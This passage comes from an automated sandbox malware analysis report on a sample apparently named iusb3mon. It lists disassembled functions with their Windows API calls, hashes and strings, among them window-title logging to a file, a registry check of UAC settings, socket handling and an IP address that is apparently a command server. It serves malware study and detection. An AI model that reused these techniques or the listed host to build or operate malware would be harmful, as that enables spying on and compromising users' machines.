                                                                                                                    • Instruction ID: c88cc571bcc346eeb932f1bd3f0b20254f9053fb1825420b78aa5ea6f3380ded
                                                                                                                    • Opcode Fuzzy Hash: 55e335b40ffbeadfb718bd2ca7546ea441e294df273cbeed9a311693ca04ac40
                                                                                                                    • Instruction Fuzzy Hash: 87E048712423197FFA311E61BCCAFEB7B1EEB056D8F014121FF04D5550D6619E418AB5
                                                                                                                    Function 06247639 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,062479A5,?,?,?), ref: 06247642
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 06247654
                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 06247676
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                    • String ID: RtlGetNtVersionNumbers$ntdll.dll
                                                                                                                    • API String ID: 145871493-1263206204
                                                                                                                    • Opcode ID: 20ab9e08b6dbc6a7b78a6d01419869df413c33b16eea490a6e187e6587d60196
                                                                                                                    • Instruction ID: 9f75d8d17015c871869890883ad2ec06ca9ac25ff8c26f420699c7d5dda9063a
                                                                                                                    • Opcode Fuzzy Hash: 20ab9e08b6dbc6a7b78a6d01419869df413c33b16eea490a6e187e6587d60196
                                                                                                                    • Instruction Fuzzy Hash: B8E0E5322143236692212F55BC4DA4B7A669BC0E50B020058FD50A1100CB30CC45D6A2
                                                                                                                    Function 06243AE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26sleepmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LocalAlloc.KERNEL32(00000040,0000046D,?,062420A0,?,00000000,00000000,?), ref: 06243AF1
                                                                                                                    • LocalSize.KERNEL32(00000000), ref: 06243B17
                                                                                                                    • Sleep.KERNEL32(00000001,00000000,00000000), ref: 06243B2A
                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 06243B31
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Local$AllocFreeSizeSleep
                                                                                                                    • String ID: 202.79.169.178
                                                                                                                    • API String ID: 1864957939-4186200246
                                                                                                                    • Opcode ID: 6f7e89ee3ea0ac64f710ff2dcde36b6fc30f5fcee39b56eeeeb1660a45f3d966
                                                                                                                    • Instruction ID: 1c424286129970d88d6ea7a718dcb6987b1e7e53b9eb8ba42147cab6f4d790f7
                                                                                                                    • Opcode Fuzzy Hash: 6f7e89ee3ea0ac64f710ff2dcde36b6fc30f5fcee39b56eeeeb1660a45f3d966
                                                                                                                    • Instruction Fuzzy Hash: F6E09275A017637BD2A17B60BC0DFEF3A999F09B61F050104FF95E1584DB60D6808BA7
                                                                                                                    Function 062474A9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,?,062479AA,?,?,?), ref: 062474B8
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 062474BF
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,062479AA,?,?), ref: 062474D3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                                    • API String ID: 4190356694-3024904723
                                                                                                                    • Opcode ID: 01c7666724a6d95ec5868d6fe886b9764d105ccee8d679e50fd89ad507e86c73
                                                                                                                    • Instruction ID: 25b6d4f7625c0c72e0744c9d10e6654c3d57d713138ab7ad25886970a2cf91ca
                                                                                                                    • Opcode Fuzzy Hash: 01c7666724a6d95ec5868d6fe886b9764d105ccee8d679e50fd89ad507e86c73
                                                                                                                    • Instruction Fuzzy Hash: 5BE09272C11316FFDB2097A1A90D9AE7BBCEF00691B010050F901E2004E7B0CB008B90
                                                                                                                    Function 06241B34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,06241B85), ref: 06241B47
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 06241B4E
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,06241B85), ref: 06241B5E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                    • String ID: IsWow64Process$kernel32
                                                                                                                    • API String ID: 4190356694-3789238822
                                                                                                                    • Opcode ID: 75f1b339fc54077defcf6586b1d2af53a85a3cc0d1ea0b31c3e0ca7de3bd6ee8
                                                                                                                    • Instruction ID: 0a34c71295a8a1dc677b5f990732225c94f7e682a7faf1ea02fb04524be2c2b2
                                                                                                                    • Opcode Fuzzy Hash: 75f1b339fc54077defcf6586b1d2af53a85a3cc0d1ea0b31c3e0ca7de3bd6ee8
                                                                                                                    • Instruction Fuzzy Hash: 30E08C72C1131AFBDB20A7E5AC0EA8E7BACDF04755B010180FA01E3504D7B4DB00DBA0
                                                                                                                    Function 06250312 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 06250370
                                                                                                                    • GetFileType.KERNEL32(00000480), ref: 0625041B
                                                                                                                    • GetStdHandle.KERNEL32(-000000F6), ref: 0625047E
                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 0625048C
                                                                                                                    • SetHandleCount.KERNEL32 ref: 062504C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FileHandleType$CountInfoStartup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1710529072-0
                                                                                                                    • Opcode ID: 1694429a91bf804f8863137c3956473e8df4af88eb324e2d2022e132a0f3b2dd
                                                                                                                    • Instruction ID: a84127797cff080b24d0f6ebaaf9af18e17afe9ed429b9727cf4701bb1ab89b3
                                                                                                                    • Opcode Fuzzy Hash: 1694429a91bf804f8863137c3956473e8df4af88eb324e2d2022e132a0f3b2dd
                                                                                                                    • Instruction Fuzzy Hash: 1A5106319247028FDBB0CB28DC8CB6977E1BB22328F16867CCDA69B2D1D7349845CB51
                                                                                                                    Function 06247DC3 Relevance: 7.6, APIs: 6, Instructions: 117memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,00000000,?,?,?,?,?,062436CC,?,?,?,062420F0,?), ref: 06247DFE
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000), ref: 06247E0E
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000014,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000,00000000,?), ref: 06247E1F
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000,00000000,?,?), ref: 06247E26
                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000), ref: 06247E4A
                                                                                                                    • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?,062436CC,?,?,?,062420F0,?,06272BD8,?,00000000), ref: 06247E59
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc$Virtual$Heap$Process
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2020977634-0
                                                                                                                    • Opcode ID: 95d8226c38939363bd70866f443bb236c99ee2468b9e90ba9974b9c55ff39707
                                                                                                                    • Instruction ID: 7d669132bd3b3955810cade031a20be0e1d94a36834226e0aeabdf083533e785
                                                                                                                    • Opcode Fuzzy Hash: 95d8226c38939363bd70866f443bb236c99ee2468b9e90ba9974b9c55ff39707
                                                                                                                    • Instruction Fuzzy Hash: 17316071A10306AFE7A8AFA9CD85E6B7BA8EF08750F100519FA15D7681D7B0ED40CB64
                                                                                                                    Function 06242B0D Relevance: 7.6, APIs: 5, Instructions: 80stringtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32(?,00000000,00000258), ref: 06242B2F
                                                                                                                    • GetWindowTextA.USER32(00000000,062720CC,00000400), ref: 06242B3D
                                                                                                                    • lstrlenA.KERNEL32(062720CC), ref: 06242B73
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 06242B81
                                                                                                                    • wsprintfA.USER32 ref: 06242BB2
                                                                                                                      • Part of subcall function 06242A59: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000,?,?), ref: 06242A71
                                                                                                                      • Part of subcall function 06242A59: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 06242AC4
                                                                                                                      • Part of subcall function 06242A59: GetFileSize.KERNEL32(00000000,00000000), ref: 06242AD1
                                                                                                                      • Part of subcall function 06242A59: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 06242AE3
                                                                                                                      • Part of subcall function 06242A59: lstrlenA.KERNEL32(06242DCE,?,00000000), ref: 06242AF1
                                                                                                                      • Part of subcall function 06242A59: WriteFile.KERNEL32(00000000,06242DCE,00000000), ref: 06242AFC
                                                                                                                      • Part of subcall function 06242A59: CloseHandle.KERNEL32(00000000), ref: 06242B03
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Windowlstrlen$CloseCreateFolderForegroundHandleLocalPathPointerSizeSpecialTextTimeWritewsprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3540613261-0
                                                                                                                    • Opcode ID: 7f7ef9437ee86e17a77e15d3661d91ba7387b3cc1cf44b60d71a616a2772959a
                                                                                                                    • Instruction ID: 7fd3322532bc67327b83a3bda6d887d6dfaf86fc08e96d5afff72ad8d714e480
                                                                                                                    • Opcode Fuzzy Hash: 7f7ef9437ee86e17a77e15d3661d91ba7387b3cc1cf44b60d71a616a2772959a
                                                                                                                    • Instruction Fuzzy Hash: EC2162B2911219BADB60ABA5DC48FEF77ACAB48305F0000A1FB44E2141D6389B84CB75
                                                                                                                    Function 06247681 Relevance: 7.6, APIs: 5, Instructions: 64registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,06247870,00000000,00020019,06247870,00000000,0000009C,00000000,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 0624769D
                                                                                                                    • RegQueryValueExA.ADVAPI32(06247870,?,00000000,80000002,00000000,?,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062476BD
                                                                                                                    • RegQueryValueExA.ADVAPI32(06247870,?,00000000,00000000,00000000,?,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062476E2
                                                                                                                    • RegCloseKey.ADVAPI32(06247870,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 062476F3
                                                                                                                    • RegCloseKey.ADVAPI32(06247870,?,?,06247870,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,PromptOnSecureDesktop,?,?), ref: 06247700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseQueryValue$Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4082589901-0
                                                                                                                    • Opcode ID: 3e37dfc5226fdb9127bfc0c20490da6bc693f5fa74cfe71e75e90986656cfda2
                                                                                                                    • Instruction ID: 36048949641c581700469049888a293a8ebb09193bd4d0712d2941000731cf60
                                                                                                                    • Opcode Fuzzy Hash: 3e37dfc5226fdb9127bfc0c20490da6bc693f5fa74cfe71e75e90986656cfda2
                                                                                                                    • Instruction Fuzzy Hash: D111257551020ABFDF15AF55EC48CAF3BBAEF89350B104466FE25A6120DB31AE10EB60
                                                                                                                    Function 06259DEB Relevance: 7.6, APIs: 5, Instructions: 52stringregistryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06259DF0
                                                                                                                    • GetClassInfoA.USER32(?,?,?), ref: 06259E0B
                                                                                                                    • RegisterClassA.USER32(00000004), ref: 06259E16
                                                                                                                    • lstrcatA.KERNEL32(00000034,?,00000001), ref: 06259E4D
                                                                                                                    • lstrcatA.KERNEL32(00000034,?), ref: 06259E5B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Classlstrcat$H_prologInfoRegister
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 106226465-0
                                                                                                                    • Opcode ID: 5e797ee3b175491e75fcdc1ede344cec241146e1213cef8ec1626df98253fe9b
                                                                                                                    • Instruction ID: 471ff739b5212189d777139477b596de3d6cacf08f7aad94607ac7d6c12466ad
                                                                                                                    • Opcode Fuzzy Hash: 5e797ee3b175491e75fcdc1ede344cec241146e1213cef8ec1626df98253fe9b
                                                                                                                    • Instruction Fuzzy Hash: DA112136A20345BEDBB0AF64EC00AEE7BB8AF05600F02451AED56A3150D77096418A61
                                                                                                                    Function 062413A5 Relevance: 7.5, APIs: 5, Instructions: 41synchronizationnetworkCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 062413AA
                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 062413CD
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062413E9
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 062413EE
                                                                                                                    • WSACleanup.WS2_32 ref: 062413F0
                                                                                                                      • Part of subcall function 0624180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
                                                                                                                      • Part of subcall function 0624180D: CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
                                                                                                                      • Part of subcall function 0624180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
                                                                                                                      • Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850
                                                                                                                      • Part of subcall function 0624180D: SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1476891362-0
                                                                                                                    • Opcode ID: df288cffeaf665cf93c3a28e086ffc4d4b1ce0f65ad7fff5fd4c2f5b3944274f
                                                                                                                    • Instruction ID: ad0c6a88848de802d0e4d648c5641570a89b36c2cd4f035cf0721e133def24e4
                                                                                                                    • Opcode Fuzzy Hash: df288cffeaf665cf93c3a28e086ffc4d4b1ce0f65ad7fff5fd4c2f5b3944274f
                                                                                                                    • Instruction Fuzzy Hash: 08010030821795DFC769FB24DE087AEBBF4AF00364F200A0CD8A252AD0CBB06A15CF51
                                                                                                                    Function 0624CDA1 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,0624DE63,0624DDE8,00000000,0624B401,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?,?), ref: 0624CDA3
                                                                                                                    • TlsGetValue.KERNEL32(?,06248D56,?,?,06248CE2,?,?,?), ref: 0624CDB1
                                                                                                                    • SetLastError.KERNEL32(00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 0624CDFD
                                                                                                                      • Part of subcall function 0625005D: HeapAlloc.KERNEL32(00000008,06248D56,00000000,00000000,00000000,00000000,00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 06250153
                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,06248D56,?,?,06248CE2,?,?,?), ref: 0624CDD5
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0624CDE6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2020098873-0
                                                                                                                    • Opcode ID: e1b9320525fb839e6f7a579752df6f1692172749efdd6d2993ba2ecc78496572
                                                                                                                    • Instruction ID: c764b2ae1f836d14ae67bbb686ffd5d360d16105d0cb0e590deee5c2f851747d
                                                                                                                    • Opcode Fuzzy Hash: e1b9320525fb839e6f7a579752df6f1692172749efdd6d2993ba2ecc78496572
                                                                                                                    • Instruction Fuzzy Hash: 7FF09636B557129BD6753B38BC0C61A3E66EF416B1B028525FEA6A61D0DF7088018B91
                                                                                                                    Function 0624CF88 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteCriticalSection.KERNEL32(00000000,?,?,0624CD75,0624B68C,0624B6E5,?,?,?), ref: 0624CFBC
                                                                                                                      • Part of subcall function 0624B2B4: HeapFree.KERNEL32(00000000,00000000,00000000,06248D56,00000000,?,06250113,00000009,00000000,00000000,00000000,00000000,00000000,?,06248D56,?), ref: 0624B388
                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,0624CD75,0624B68C,0624B6E5,?,?,?), ref: 0624CFD7
                                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 0624CFDF
                                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 0624CFE7
                                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 0624CFEF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalDeleteSection$FreeHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 447823528-0
                                                                                                                    • Opcode ID: f08fa989a6def0316041463758250286147a0e24095cd6641db0dcb99e3ab10c
                                                                                                                    • Instruction ID: 6a1f4361254af0dc0f6bcd06255567fcc52bc555dda36168ac96fee39eb8650a
                                                                                                                    • Opcode Fuzzy Hash: f08fa989a6def0316041463758250286147a0e24095cd6641db0dcb99e3ab10c
                                                                                                                    • Instruction Fuzzy Hash: B9F0892BF2F295558AFC3A1FFC8C84D6A52AF803603178036FDD456070C5154C80CF95
                                                                                                                    Function 0624180D Relevance: 7.5, APIs: 5, Instructions: 28COMMONLIBRARYCODE
